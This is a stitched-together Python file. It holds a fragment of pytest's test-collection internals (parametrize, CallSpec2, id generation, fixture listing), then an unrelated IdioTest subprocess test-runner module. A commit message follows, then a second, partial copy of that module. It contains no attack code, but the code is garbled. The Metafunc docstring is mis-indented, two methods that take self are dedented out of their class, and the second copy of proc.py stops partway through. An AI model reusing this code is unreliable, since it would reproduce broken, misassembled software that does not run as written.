    """ mixin for the code common to function-item nodes. """
    def setup(self):
        """ perform setup for this test function. """
        if isinstance(self.parent, Instance):
            # every test method gets a fresh instance of its class
            self.parent.newinstance()
            self.obj = self._getobj()
    def _prunetraceback(self, excinfo):
        """Trim *excinfo*'s traceback to the frames relevant to the test
        function, falling back to the full traceback when trimming would
        remove everything."""
        if hasattr(self, "_obj") and not self.config.getoption("fulltrace", False):
            code = _pytest._code.Code(get_real_func(self.obj))
            path, firstlineno = code.path, code.firstlineno
            traceback = excinfo.traceback
            # progressively weaker cuts: exact location, then file, then
            # the generic pytest-internals filter
            ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
            if ntraceback == traceback:
                ntraceback = ntraceback.cut(path=path)
                if ntraceback == traceback:
                    ntraceback = ntraceback.filter(filter_traceback)
                    if not ntraceback:
                        ntraceback = traceback
            excinfo.traceback = ntraceback.filter()
            # issue364: mark all but first and last frames to
            # only show a single-line message for each frame
            if self.config.getoption("tbstyle", "auto") == "auto":
                if len(excinfo.traceback) > 2:
                    for entry in excinfo.traceback[1:-1]:
                        entry.set_repr_style("short")
    def repr_failure(self, excinfo, outerr=None):
        """Render a failure representation; "auto" tb style maps to "long"."""
        assert outerr is None, "XXX outerr usage is deprecated"
        style = self.config.getoption("tbstyle", "auto")
        if style == "auto":
            style = "long"
        return self._repr_failure_py(excinfo, style=style)
def hasinit(obj):
    """Return True if *obj* defines its own ``__init__`` (i.e. one that is
    not the inherited ``object.__init__``), False otherwise.

    Previously returned an implicit ``None`` when no ``__init__`` attribute
    was found; now always returns a bool — still falsy in that case, so
    truthiness-based callers are unaffected.
    """
    init = getattr(obj, "__init__", None)
    return init is not None and init != object.__init__
def hasnew(obj):
    """Return True if *obj* defines its own ``__new__`` (i.e. one that is
    not the inherited ``object.__new__``), False otherwise.

    Previously returned an implicit ``None`` when no ``__new__`` attribute
    was found; now always returns a bool — still falsy in that case, so
    truthiness-based callers are unaffected.
    """
    new = getattr(obj, "__new__", None)
    return new is not None and new != object.__new__
class CallSpec2:
    """Accumulates the arguments, ids, marks, scopes and indices of one
    concrete parametrized invocation of a test function."""
    def __init__(self, metafunc):
        self.metafunc = metafunc
        # arguments passed directly to the test function
        self.funcargs = {}
        # id fragments, joined with "-" to form the final test id
        self._idlist = []
        # values routed to fixtures via request.param
        self.params = {}
        self._globalid = NOTSET
        self._globalparam = NOTSET
        self._arg2scopenum = {}  # used for sorting parametrized resources
        self.marks = []
        self.indices = {}
    def copy(self):
        """Return an independent copy of this call spec."""
        clone = CallSpec2(self.metafunc)
        clone.funcargs.update(self.funcargs)
        clone.params.update(self.params)
        clone.marks.extend(self.marks)
        clone.indices.update(self.indices)
        clone._arg2scopenum.update(self._arg2scopenum)
        clone._idlist = list(self._idlist)
        clone._globalid = self._globalid
        clone._globalparam = self._globalparam
        return clone
    def _checkargnotcontained(self, arg):
        # an argument may only be set once per call spec
        already_set = arg in self.params or arg in self.funcargs
        if already_set:
            raise ValueError("duplicate {!r}".format(arg))
    def getparam(self, name):
        """Return the param value for *name*, falling back to the global
        param; raise ValueError when neither is set."""
        if name in self.params:
            return self.params[name]
        if self._globalparam is NOTSET:
            raise ValueError(name)
        return self._globalparam
    @property
    def id(self):
        # falsy id fragments are dropped before joining
        return "-".join(str(part) for part in self._idlist if part)
    def setmulti2(self, valtypes, argnames, valset, id, marks, scopenum, param_index):
        """Record one parameter set: route each value to ``funcargs`` or
        ``params`` per *valtypes*, and append the id and marks."""
        for arg, val in zip(argnames, valset):
            self._checkargnotcontained(arg)
            destination = getattr(self, valtypes[arg])
            destination[arg] = val
            self.indices[arg] = param_index
            self._arg2scopenum[arg] = scopenum
        self._idlist.append(id)
        self.marks.extend(normalize_mark_list(marks))
class Metafunc:
"""
Metafunc objects are passed to the :func:`pytest_generate_tests <_pytest.hookspec.pytest_generate_tests>` hook.
They help to inspect a test function and to generate tests according to
test configuration or values specified in the class or module where a
test function is defined.
"""
    def __init__(self, definition, fixtureinfo, config, cls=None, module=None):
        """Initialize from a FunctionDefinition node and its fixture info."""
        # "DefinitionMock" is accepted to ease testing of this class.
        assert (
            isinstance(definition, FunctionDefinition)
            or type(definition).__name__ == "DefinitionMock"
        )
        self.definition = definition
        #: access to the :class:`_pytest.config.Config` object for the test session
        self.config = config
        #: the module object where the test function is defined in.
        self.module = module
        #: underlying python test function
        self.function = definition.obj
        #: set of fixture names required by the test function
        self.fixturenames = fixtureinfo.names_closure
        #: class object where the test function is defined in or ``None``.
        self.cls = cls
        # one CallSpec2 per concrete parametrized invocation
        self._calls = []
        self._ids = set()
        self._arg2fixturedefs = fixtureinfo.name2fixturedefs
    @property
    def funcargnames(self):
        """ alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
        # Deprecated alias: emits the FUNCARGNAMES warning on every access.
        warnings.warn(FUNCARGNAMES, stacklevel=2)
        return self.fixturenames
    def parametrize(self, argnames, argvalues, indirect=False, ids=None, scope=None):
        """ Add new invocations to the underlying test function using the list
        of argvalues for the given argnames.  Parametrization is performed
        during the collection phase.  If you need to setup expensive resources
        see about setting indirect to do it rather at test setup time.
        :arg argnames: a comma-separated string denoting one or more argument
                       names, or a list/tuple of argument strings.
        :arg argvalues: The list of argvalues determines how often a
            test is invoked with different argument values.  If only one
            argname was specified argvalues is a list of values.  If N
            argnames were specified, argvalues must be a list of N-tuples,
            where each tuple-element specifies a value for its respective
            argname.
        :arg indirect: The list of argnames or boolean. A list of arguments'
            names (subset of argnames). If True the list contains all names from
            the argnames. Each argvalue corresponding to an argname in this list will
            be passed as request.param to its respective argname fixture
            function so that it can perform more expensive setups during the
            setup phase of a test rather than at collection time.
        :arg ids: list of string ids, or a callable.
            If strings, each is corresponding to the argvalues so that they are
            part of the test id. If None is given as id of specific test, the
            automatically generated id for that argument will be used.
            If callable, it should take one argument (a single argvalue) and return
            a string or return None. If None, the automatically generated id for that
            argument will be used.
            If no ids are provided they will be generated automatically from
            the argvalues.
        :arg scope: if specified it denotes the scope of the parameters.
            The scope is used for grouping tests by parameter instances.
            It will also override any fixture-function defined scope, allowing
            to set a dynamic scope using test context or configuration.
        """
        from _pytest.fixtures import scope2index
        from _pytest.mark import ParameterSet
        # normalize argnames/argvalues into a list of names + ParameterSets
        argnames, parameters = ParameterSet._for_parametrize(
            argnames,
            argvalues,
            self.function,
            self.config,
            function_definition=self.definition,
        )
        del argvalues
        if "request" in argnames:
            fail(
                "'request' is a reserved name and cannot be used in @pytest.mark.parametrize",
                pytrace=False,
            )
        if scope is None:
            scope = _find_parametrized_scope(argnames, self._arg2fixturedefs, indirect)
        self._validate_if_using_arg_names(argnames, indirect)
        # decide per-argname whether values go to a fixture ("params") or
        # directly to the function ("funcargs")
        arg_values_types = self._resolve_arg_value_types(argnames, indirect)
        ids = self._resolve_arg_ids(argnames, ids, parameters, item=self.definition)
        scopenum = scope2index(
            scope, descr="parametrize() call in {}".format(self.function.__name__)
        )
        # create the new calls: if we are parametrize() multiple times (by applying the decorator
        # more than once) then we accumulate those calls generating the cartesian product
        # of all calls
        newcalls = []
        for callspec in self._calls or [CallSpec2(self)]:
            for param_index, (param_id, param_set) in enumerate(zip(ids, parameters)):
                newcallspec = callspec.copy()
                newcallspec.setmulti2(
                    arg_values_types,
                    argnames,
                    param_set.values,
                    param_id,
                    param_set.marks,
                    scopenum,
                    param_index,
                )
                newcalls.append(newcallspec)
        self._calls = newcalls
    def _resolve_arg_ids(self, argnames, ids, parameters, item):
        """Resolves the actual ids for the given argnames, based on the ``ids`` parameter given
        to ``parametrize``.
        :param List[str] argnames: list of argument names passed to ``parametrize()``.
        :param ids: the ids parameter of the parametrized call (see docs).
        :param List[ParameterSet] parameters: the list of parameter values, same size as ``argnames``.
        :param Item item: the item that generated this parametrized call.
        :rtype: List[str]
        :return: the list of ids for each argname given
        """
        from _pytest._io.saferepr import saferepr
        idfn = None
        if callable(ids):
            # a callable is handed through to idmaker; no explicit ids list
            idfn = ids
            ids = None
        if ids:
            # explicit list of ids: must match parameter count and be strings (or None)
            func_name = self.function.__name__
            if len(ids) != len(parameters):
                msg = "In {}: {} parameter sets specified, with different number of ids: {}"
                fail(msg.format(func_name, len(parameters), len(ids)), pytrace=False)
            for id_value in ids:
                if id_value is not None and not isinstance(id_value, str):
                    msg = "In {}: ids must be list of strings, found: {} (type: {!r})"
                    fail(
                        msg.format(func_name, saferepr(id_value), type(id_value)),
                        pytrace=False,
                    )
        ids = idmaker(argnames, parameters, idfn, ids, self.config, item=item)
        return ids
def _resolve_arg_value_types(self, argnames, indirect):
    """Decide, per parametrized argument, whether it feeds a fixture or the
    test function directly, based on the ``indirect`` parameter.

    :param List[str] argnames: list of argument names passed to ``parametrize()``.
    :param indirect: same ``indirect`` parameter of ``parametrize()``.
    :rtype: Dict[str, str]

    Maps each arg name to ``"params"`` (parameter of a fixture of the same
    name) or ``"funcargs"`` (plain argument of the test function).
    """
    if isinstance(indirect, bool):
        # A single flag applies to every argument uniformly.
        mode = "params" if indirect else "funcargs"
        return dict.fromkeys(argnames, mode)
    if isinstance(indirect, Sequence):
        # Default everything to funcargs, then promote the listed names.
        valtypes = dict.fromkeys(argnames, "funcargs")
        for name in indirect:
            if name not in argnames:
                fail(
                    "In {}: indirect fixture '{}' doesn't exist".format(
                        self.function.__name__, name
                    ),
                    pytrace=False,
                )
            valtypes[name] = "params"
        return valtypes
    fail(
        "In {func}: expected Sequence or boolean for indirect, got {type}".format(
            type=type(indirect).__name__, func=self.function.__name__
        ),
        pytrace=False,
    )
def _validate_if_using_arg_names(self, argnames, indirect):
    """
    Check if all argnames are being used, by default values, or directly/indirectly.

    :param List[str] argnames: list of argument names passed to ``parametrize()``.
    :param indirect: same ``indirect`` parameter of ``parametrize()``.
    :raise ValueError: if validation fails.
    """
    default_arg_names = set(get_default_arg_names(self.function))
    func_name = self.function.__name__
    for arg in argnames:
        if arg not in self.fixturenames:
            if arg in default_arg_names:
                # Parametrizing an argument that already has a default value
                # is almost certainly a user mistake.
                fail(
                    "In {}: function already takes an argument '{}' with a default value".format(
                        func_name, arg
                    ),
                    pytrace=False,
                )
            else:
                # Word the error according to how the argument was expected
                # to be consumed (fixture vs. plain function argument).
                if isinstance(indirect, (tuple, list)):
                    name = "fixture" if arg in indirect else "argument"
                else:
                    name = "fixture" if indirect else "argument"
                fail(
                    "In {}: function uses no {} '{}'".format(func_name, name, arg),
                    pytrace=False,
                )
def _find_parametrized_scope(argnames, arg2fixturedefs, indirect):
    """Find the most appropriate scope for a parametrized call based on its arguments.

    When there's at least one direct argument, always use "function" scope.

    When a test function is parametrized and all its arguments are indirect
    (e.g. fixtures), return the most narrow scope based on the fixtures used.

    Related to issue #1832, based on code posted by @Kingdread.
    """
    from _pytest.fixtures import scopes

    if isinstance(indirect, (list, tuple)):
        everything_indirect = len(indirect) == len(argnames)
    else:
        everything_indirect = bool(indirect)
    if everything_indirect:
        used_scopes = [
            fixturedef[0].scope
            for name, fixturedef in (arg2fixturedefs or {}).items()
            if name in argnames
        ]
        # ``scopes`` is ordered broadest-first, so scanning it reversed
        # yields the narrowest scope any used fixture declares.
        narrowest = next((s for s in reversed(scopes) if s in used_scopes), None)
        if narrowest is not None:
            return narrowest
    return "function"
def _ascii_escaped_by_config(val, config):
    """Escape *val* for use in a test id, unless the user disabled escaping
    through the (deliberately scary) ini option."""
    opt_name = "disable_test_id_escaping_and_forfeit_all_rights_to_community_support"
    escaping_disabled = config.getini(opt_name) if config is not None else False
    return val if escaping_disabled else ascii_escaped(val)
def _idval(val, argname, idx, idfn, item, config):
    """Generate the id string for a single parameter value.

    Precedence: user-supplied id function, then the
    ``pytest_make_parametrize_id`` hook, then type-based formatting,
    finally the positional fallback ``<argname><idx>``.
    """
    if idfn:
        try:
            generated_id = idfn(val)
            # ``None`` from the id function means "no opinion, fall through".
            if generated_id is not None:
                val = generated_id
        except Exception as e:
            # See issue https://github.com/pytest-dev/pytest/issues/2169
            msg = "{}: error raised while trying to determine id of parameter '{}' at position {}\n"
            msg = msg.format(item.nodeid, argname, idx)
            raise ValueError(msg) from e
    elif config:
        hook_id = config.hook.pytest_make_parametrize_id(
            config=config, val=val, argname=argname
        )
        if hook_id:
            return hook_id
    if isinstance(val, STRING_TYPES):
        return _ascii_escaped_by_config(val, config)
    elif val is None or isinstance(val, (float, int, bool)):
        return str(val)
    elif isinstance(val, REGEX_TYPE):
        return ascii_escaped(val.pattern)
    elif isinstance(val, enum.Enum):
        return str(val)
    elif hasattr(val, "__name__") and isinstance(val.__name__, str):
        # name of a class, function, module, etc.
        return val.__name__
    # Positional fallback: e.g. "arg0", "arg1", ...
    return str(argname) + str(idx)
def _idvalset(idx, parameterset, argnames, idfn, ids, item, config):
    """Compute the id for one parameter set.

    An explicit ``pytest.param(..., id=...)`` always wins; otherwise a
    user-supplied entry from ``ids`` is used when present, and the id is
    generated from the individual values as the last resort.
    """
    if parameterset.id is not None:
        return parameterset.id
    user_supplied = ids is not None and idx < len(ids) and ids[idx] is not None
    if user_supplied:
        return _ascii_escaped_by_config(ids[idx], config)
    parts = [
        _idval(value, name, idx, idfn, item=item, config=config)
        for value, name in zip(parameterset.values, argnames)
    ]
    return "-".join(parts)
def idmaker(argnames, parametersets, idfn=None, ids=None, config=None, item=None):
    """Build the id string for every parameter set, de-duplicating clashes
    by appending a per-id running counter suffix."""
    resolved = [
        _idvalset(index, pset, argnames, idfn, ids, config=config, item=item)
        for index, pset in enumerate(parametersets)
    ]
    if len(set(resolved)) == len(resolved):
        return resolved
    # Some ids clash: suffix every occurrence of a duplicated id with its
    # occurrence count (0, 1, 2, ...), keeping unique ids untouched.
    dupes = {testid for testid in resolved if resolved.count(testid) > 1}
    counters = Counter()
    for index, testid in enumerate(resolved):
        if testid in dupes:
            resolved[index] = testid + str(counters[testid])
            counters[testid] += 1
    return resolved
def show_fixtures_per_test(config):
    """Run a collection-only session that prints, for every collected test,
    the fixtures it uses (implements ``--fixtures-per-test``)."""
    from _pytest.main import wrap_session

    return wrap_session(config, _show_fixtures_per_test)
def _show_fixtures_per_test(config, session):
    """Collect the session, then print each test item with the fixtures it uses."""
    import _pytest.config

    session.perform_collect()
    curdir = py.path.local()
    tw = _pytest.config.create_terminal_writer(config)
    verbose = config.getvalue("verbose")

    def get_best_relpath(func):
        # Path of *func*'s definition, relative to the invocation directory.
        loc = getlocation(func, curdir)
        return curdir.bestrelpath(loc)

    def write_fixture(fixture_def):
        argname = fixture_def.argname
        # Private fixtures (leading underscore) are hidden unless -v.
        if verbose <= 0 and argname.startswith("_"):
            return
        if verbose > 0:
            bestrel = get_best_relpath(fixture_def.func)
            funcargspec = "{} -- {}".format(argname, bestrel)
        else:
            funcargspec = argname
        tw.line(funcargspec, green=True)
        fixture_doc = fixture_def.func.__doc__
        if fixture_doc:
            write_docstring(tw, fixture_doc)
        else:
            tw.line(" no docstring available", red=True)

    def write_item(item):
        try:
            info = item._fixtureinfo
        except AttributeError:
            # doctests items have no _fixtureinfo attribute
            return
        if not info.name2fixturedefs:
            # this test item does not use any fixtures
            return
        tw.line()
        tw.sep("-", "fixtures used by {}".format(item.name))
        tw.sep("-", "({})".format(get_best_relpath(item.function)))
        # dict key not used in loop but needed for sorting
        for _, fixturedefs in sorted(info.name2fixturedefs.items()):
            assert fixturedefs is not None
            if not fixturedefs:
                continue
            # last item is expected to be the one used by the test item
            write_fixture(fixturedefs[-1])

    for session_item in session.items:
        write_item(session_item)
def showfixtures(config):
    """Run a collection-only session that prints every available fixture
    (implements ``--fixtures``)."""
    from _pytest.main import wrap_session

    return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
    """Collect the session, then print every available fixture grouped by
    defining module."""
    import _pytest.config

    session.perform_collect()
    curdir = py.path.local()
    tw = _pytest.config.create_terminal_writer(config)
    verbose = config.getvalue("verbose")

    fm = session._fixturemanager

    available = []
    seen = set()

    for argname, fixturedefs in fm._arg2fixturedefs.items():
        assert fixturedefs is not None
        if not fixturedefs:
            continue
        for fixturedef in fixturedefs:
            loc = getlocation(fixturedef.func, curdir)
            # Skip fixtures already recorded under the same (name, location).
            if (fixturedef.argname, loc) in seen:
                continue
            seen.add((fixturedef.argname, loc))
            available.append(
                (
                    len(fixturedef.baseid),
                    fixturedef.func.__module__,
                    curdir.bestrelpath(loc),
                    fixturedef.argname,
                    fixturedef,
                )
            )

    # Tuple sort groups output by baseid length, then module, path, argname.
    available.sort()
    currentmodule = None
    for baseid, module, bestrel, argname, fixturedef in available:
        if currentmodule != module:
            if not module.startswith("_pytest."):
                tw.line()
                tw.sep("-", "fixtures defined from {}".format(module))
                currentmodule = module
        # Private fixtures are hidden unless -v.
        if verbose <= 0 and argname[0] == "_":
            continue
        tw.write(argname, green=True)
        if fixturedef.scope != "function":
            tw.write(" [%s scope]" % fixturedef.scope, cyan=True)
        if verbose > 0:
            tw.write(" -- %s" % bestrel, yellow=True)
        tw.write("\n")
        loc = getlocation(fixturedef.func, curdir)
        doc = fixturedef.func.__doc__ or ""
        if doc:
            write_docstring(tw, doc)
        else:
            tw.line(" {}: no docstring available".format(loc), red=True)
    tw.line()
def write_docstring(tw, doc, indent=" "):
    """Write *doc* to terminal writer *tw*: the stripped first line and the
    dedented remainder, every line prefixed with *indent*."""
    doc = doc.rstrip()
    firstline, _, rest = doc.partition("\n")
    if firstline.strip():
        tw.line(indent + firstline.strip())
    if rest:
        for line in dedent(rest).split("\n"):
            tw.write(indent + line + "\n")
class Function(FunctionMixin, nodes.Item):
    """ a Function Item is responsible for setting up and executing a
    Python test function.
    """

    # disable since functions handle it themselves
    _ALLOW_MARKERS = False

    def __init__(
        self,
        name,
        parent,
        args=None,
        config=None,
        callspec=None,
        callobj=NOTSET,
        keywords=None,
        session=None,
        fixtureinfo=None,
        originalname=None,
    ):
        super().__init__(name, parent, config=config, session=session)
        self._args = args
        if callobj is not NOTSET:
            # An explicitly supplied callable overrides lookup via _getobj().
            self.obj = callobj

        self.keywords.update(self.obj.__dict__)
        self.own_markers.extend(get_unpacked_marks(self.obj))
        if callspec:
            self.callspec = callspec
            # this is total hostile and a mess
            # keywords are broken by design by now
            # this will be redeemed later
            for mark in callspec.marks:
                # feel free to cry, this was broken for years before
                # and keywords cant fix it per design
                self.keywords[mark.name] = mark
            self.own_markers.extend(normalize_mark_list(callspec.marks))
        if keywords:
            self.keywords.update(keywords)

        # todo: this is a hell of a hack
        # https://github.com/pytest-dev/pytest/issues/4569
        self.keywords.update(
            {
                mark.name: True
                for mark in self.iter_markers()
                if mark.name not in self.keywords
            }
        )

        if fixtureinfo is None:
            fixtureinfo = self.session._fixturemanager.getfixtureinfo(
                self, self.obj, self.cls, funcargs=True
            )
        self._fixtureinfo = fixtureinfo
        self.fixturenames = fixtureinfo.names_closure
        self._initrequest()
        #: original function name, without any decorations (for example
        #: parametrization adds a ``"[...]"`` suffix to function names).
        #:
        #: .. versionadded:: 3.0
        self.originalname = originalname

    def _initrequest(self):
        # Fresh funcargs mapping and fixture request for each (re)run.
        self.funcargs = {}
        self._request = fixtures.FixtureRequest(self)

    @property
    def function(self):
        "underlying python 'function' object"
        return getimfunc(self.obj)

    def _getobj(self):
        # Strip the parametrization suffix ("[...]") before attribute lookup.
        name = self.name
        i = name.find("[")  # parametrization
        if i != -1:
            name = name[:i]
        return getattr(self.parent.obj, name)

    @property
    def _pyfuncitem(self):
        "(compatonly) for code expecting pytest-2.2 style request objects"
        return self

    @property
    def funcargnames(self):
        """ alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
        warnings.warn(FUNCARGNAMES, stacklevel=2)
        return self.fixturenames

    def runtest(self):
        """ execute the underlying test function. """
        self.ihook.pytest_pyfunc_call(pyfuncitem=self)

    def setup(self):
        super().setup()
        fixtures.fillfixtures(self)
class FunctionDefinition(Function):
    """
    internal hack until we get actual definition nodes instead of the
    crappy metafunc hack
    """

    def runtest(self):
        # A definition node only carries metadata; executing it is an error.
        raise RuntimeError("function definitions are not supposed to be used")

    # Setting up a definition is equally meaningless, so reuse the guard.
    setup = runtest
|
# IdioTest - idiotest/proc.py
# Copyright 2009 Dietrich Epp <depp@zdome.net>
# This source code is licensed under the GNU General Public License,
# Version 3. See gpl-3.0.txt for details.
"""IdioTest process utilities.
This contains the TestProc class, which runs a program and compares
its output to the expected output. It is fairly versatile.
"""
import subprocess
from cStringIO import StringIO
import encodings.utf_8
import idiotest.fail
import difflib
def getsigdict():
    """Build a mapping from signal number to symbolic name (e.g. 2 -> 'SIGINT')."""
    import signal

    return dict(
        (value, name)
        for name, value in signal.__dict__.items()
        if name.startswith('SIG') and isinstance(value, int)
    )

# Module-level cache of the signal-number -> name table.
sigdict = getsigdict()
def signame(signum):
    """Return a human-readable description of *signum*, including the
    symbolic name when it is known."""
    name = sigdict.get(signum)
    if name is None:
        return 'signal %i' % (signum,)
    return 'signal %i (%s)' % (signum, name)
class ProcException(idiotest.fail.TestFailure):
    """Base class for failures raised while running a test process."""
    pass
class ProcFailure(ProcException):
    """Raised when the process exits with an unexpected status code."""
    def __init__(self, retval):
        ProcException.__init__(self, u"process returned failure (%i)" % retval)
        # Exit status of the failed process.
        self.retval = retval
class ProcSignal(ProcException):
    """Raised when the process is killed by a signal."""
    def __init__(self, signal):
        ProcException.__init__(self, u"process received %s" % signame(signal))
        # Number of the signal that killed the process.
        self.signal = signal
class ProcOutput(ProcException):
    """Raised when the process output does not match the expected output."""
    def __init__(self):
        ProcException.__init__(self, u"incorrect output")
def write_stream(name, stream, file):
    """Pretty-print captured *stream* to *file* under a ``=== name ===`` header.

    Byte streams are decoded as UTF-8; when decoding fails, lines are shown
    via ``repr`` instead.  Nothing is written for an empty stream.
    """
    if not stream:
        return
    file.write(u"=== %s ===\n" % name)
    try:
        # NOTE: ``unicode`` is the Python 2 text type (this is Python 2 code).
        if not isinstance(stream, unicode):
            stream = encodings.utf_8.decode(stream)[0]
    except UnicodeDecodeError:
        file.write(u'<invalid unicode>\n')
        for line in stream.splitlines():
            # repr()[1:-1] drops the surrounding quotes but keeps escapes.
            file.write(u' %s\n' % repr(line)[1:-1])
        if stream and not stream.endswith('\n'):
            file.write(u'<no newline at end of stream>\n')
    else:
        for line in stream.splitlines():
            file.write(u' %s\n' % line)
        if stream and not stream.endswith(u'\n'):
            file.write(u'<no newline at end of stream>\n')
class InNone(object):
    """Stdin specification: the child process gets no input."""
    def popenarg(self):
        return subprocess.PIPE
    def commarg(self):
        # Empty string: communicate() closes the pipe immediately.
        return ''
    def __nonzero__(self):
        # Python 2 truthiness hook: "no input" is falsy.
        return False
    def decorate(self, err):
        # Nothing to report for absent input.
        pass
class InFile(object):
    """Stdin specification: feed the child the contents of a file."""
    def __init__(self, path):
        self.path = path
    def popenarg(self):
        # Hand the open file object directly to Popen as stdin.
        return open(self.path, 'rb')
    def commarg(self):
        # Nothing to push through communicate(); stdin is the file itself.
        return None
    def decorate(self, err):
        err.write(u"input file: %s\n" % repr(self.path))
    def contents(self):
        return open(self.path, 'rb').read()
class InString(object):
    """Stdin specification: feed the child a literal string."""
    def __init__(self, string):
        self.string = string
    def popenarg(self):
        return subprocess.PIPE
    def commarg(self):
        # NOTE: ``unicode`` is the Python 2 text type; text is sent as UTF-8.
        if isinstance(self.string, unicode):
            return encodings.utf_8.encode(self.string)[0]
        return self.string
    def decorate(self, err):
        write_stream(u'stdin', self.string, err)
    def contents(self):
        return self.string
def parse_input(input):
    """Map an input/output spec to an In* object: ``None`` means no input,
    ``'@path'`` means the contents of a file, anything else is a literal."""
    if input is None:
        return InNone()
    return InFile(input[1:]) if input.startswith('@') else InString(input)
class Proc(object):
    """One invocation of a child process: runs it with the given input,
    captures stdout (and optionally stderr), and records the exit status."""
    def __init__(self, cmd, input, cwd, geterr):
        # cmd: argv list; input: an In* object; cwd: working dir or None;
        # geterr: whether stderr should be captured.
        self.cmd = cmd
        self.input = input
        self.cwd = cwd
        self.error = None
        self.output = None
        self.geterr = geterr
    def run(self):
        """Execute the command, storing output, error and retcode."""
        if self.geterr:
            stderr = subprocess.PIPE
        else:
            stderr = None
        proc = subprocess.Popen(
            self.cmd, cwd=self.cwd, stdin=self.input.popenarg(),
            stdout=subprocess.PIPE, stderr=stderr)
        output, error = proc.communicate(self.input.commarg())
        retcode = proc.returncode
        self.output = output
        self.error = error
        self.retcode = retcode
    def check_signal(self):
        """Raise ProcSignal if the process was killed by a signal."""
        # A negative return code means termination by that signal number.
        if self.retcode < 0:
            err = ProcSignal(-self.retcode)
            self.decorate(err)
            raise err
    def check_success(self, result):
        """Raise unless the process exited normally with status *result*."""
        self.check_signal()
        if self.retcode != result:
            err = ProcFailure(self.retcode)
            self.decorate(err)
            raise err
    def decorate(self, err):
        """Attach command, cwd, input and stderr details to exception *err*."""
        err.write(u'command: %s\n' % ' '.join(self.cmd))
        if self.cwd is not None:
            err.write(u'cwd: %s\n' % self.cwd)
        self.input.decorate(err)
        write_stream('stderr', self.error, err)
class ProcRunner(object):
    """Runs commands and checks their exit status and output."""
    def __init__(self):
        # Capture stderr by default so failures can include it.
        self.geterr = True
    def proc(self, cmd, input, cwd):
        """Create a Proc for *cmd*; hook point for wrapper subclasses."""
        return Proc(cmd, input, cwd, self.geterr)
    def get_output(self, cmd, input=None, cwd=None, result=0):
        """Run *cmd*, require exit status *result*, and return its stdout."""
        p = self.proc(cmd, parse_input(input), cwd)
        p.run()
        p.check_success(result)
        return p.output
    def check_output(self, cmd, input=None, output=None,
                     cwd=None, result=0):
        """Run *cmd* and fail with a diff if its stdout differs from *output*.

        *output* uses the same spec syntax as *input* ('@file' or literal).
        """
        p = self.proc(cmd, parse_input(input), cwd)
        p.run()
        p.check_success(result)
        output = parse_input(output).contents()
        procout = p.output
        # NOTE: ``unicode`` is the Python 2 text type (this is Python 2 code).
        if isinstance(output, unicode):
            try:
                procout = encodings.utf_8.decode(procout)[0]
            except UnicodeDecodeError:
                err = ProcOutput()
                p.decorate(err)
                write_stream(u'output', procout, err)
                raise err
            if procout != output:
                err = ProcOutput()
                p.decorate(err)
                eout = output.splitlines(True)
                pout = procout.splitlines(True)
                err.write(u"=== diff ===\n")
                for line in difflib.Differ().compare(eout, pout):
                    err.write(line)
                raise err
        else:
            # Byte comparison: diff repr() of each line so that invisible
            # byte-level differences become visible.
            if procout != output:
                err = ProcOutput()
                p.decorate(err)
                eout = [repr(x)+'\n' for x in output.splitlines(True)]
                pout = [repr(x)+'\n' for x in procout.splitlines(True)]
                err.write(u"=== diff ===\n")
                for line in difflib.Differ().compare(eout, pout):
                    err.write(line)
                raise err
class ProcWrapper(ProcRunner):
    """ProcRunner that wraps every command in a template such as
    ``"valgrind %"``, where ``%`` marks where the real command goes."""
    def __init__(self, wrap):
        ProcRunner.__init__(self)
        parts = wrap.split()
        try:
            split_at = parts.index('%')
        except ValueError:
            raise Exception("Invalid wrapper, missing %%: %s" % repr(wrap))
        self.prefix = parts[:split_at]
        self.suffix = parts[split_at+1:]
    def proc(self, cmd, input, cwd):
        # Splice the real command into the wrapper template.
        return ProcRunner.proc(self, self.prefix + cmd + self.suffix, input, cwd)
Fixed broken pipes.
# IdioTest - idiotest/proc.py
# Copyright 2009 Dietrich Epp <depp@zdome.net>
# This source code is licensed under the GNU General Public License,
# Version 3. See gpl-3.0.txt for details.
"""IdioTest process utilities.
This contains the TestProc class, which runs a program and compares
its output to the expected output. It is fairly versatile.
"""
import subprocess
from cStringIO import StringIO
import encodings.utf_8
import idiotest.fail
import difflib
import errno
def getsigdict():
    """Build a mapping from signal number to symbolic name (e.g. 2 -> 'SIGINT')."""
    import signal

    return dict(
        (value, name)
        for name, value in signal.__dict__.items()
        if name.startswith('SIG') and isinstance(value, int)
    )

# Module-level cache of the signal-number -> name table.
sigdict = getsigdict()
def signame(signum):
    """Return a human-readable description of *signum*, including the
    symbolic name when it is known."""
    name = sigdict.get(signum)
    if name is None:
        return 'signal %i' % (signum,)
    return 'signal %i (%s)' % (signum, name)
class ProcException(idiotest.fail.TestFailure):
    """Base class for failures raised while running a test process."""
    pass
class ProcFailure(ProcException):
    """Raised when the process exits with an unexpected status code."""
    def __init__(self, retval):
        ProcException.__init__(self, u"process returned failure (%i)" % retval)
        # Exit status of the failed process.
        self.retval = retval
class ProcSignal(ProcException):
    """Raised when the process is killed by a signal."""
    def __init__(self, signal):
        ProcException.__init__(self, u"process received %s" % signame(signal))
        # Number of the signal that killed the process.
        self.signal = signal
class ProcOutput(ProcException):
    """Raised when the process output does not match the expected output."""
    def __init__(self):
        ProcException.__init__(self, u"incorrect output")
class ProcPipe(ProcException):
    """Raised when the child closes stdin before consuming all of its input
    (broken pipe / EPIPE)."""
    def __init__(self):
        ProcException.__init__(self, u"process closed stdin unexpectedly")
        # BUG FIX: the original ended with ``self.retval = retval``, but no
        # ``retval`` exists in this scope, so constructing ProcPipe raised
        # NameError instead of the intended exception.  ProcPipe carries no
        # return value, so the assignment is simply removed.
def write_stream(name, stream, file):
    """Pretty-print captured *stream* to *file* under a ``=== name ===`` header.

    Byte streams are decoded as UTF-8; when decoding fails, lines are shown
    via ``repr`` instead.  Nothing is written for an empty stream.
    """
    if not stream:
        return
    file.write(u"=== %s ===\n" % name)
    try:
        # NOTE: ``unicode`` is the Python 2 text type (this is Python 2 code).
        if not isinstance(stream, unicode):
            stream = encodings.utf_8.decode(stream)[0]
    except UnicodeDecodeError:
        file.write(u'<invalid unicode>\n')
        for line in stream.splitlines():
            # repr()[1:-1] drops the surrounding quotes but keeps escapes.
            file.write(u' %s\n' % repr(line)[1:-1])
        if stream and not stream.endswith('\n'):
            file.write(u'<no newline at end of stream>\n')
    else:
        for line in stream.splitlines():
            file.write(u' %s\n' % line)
        if stream and not stream.endswith(u'\n'):
            file.write(u'<no newline at end of stream>\n')
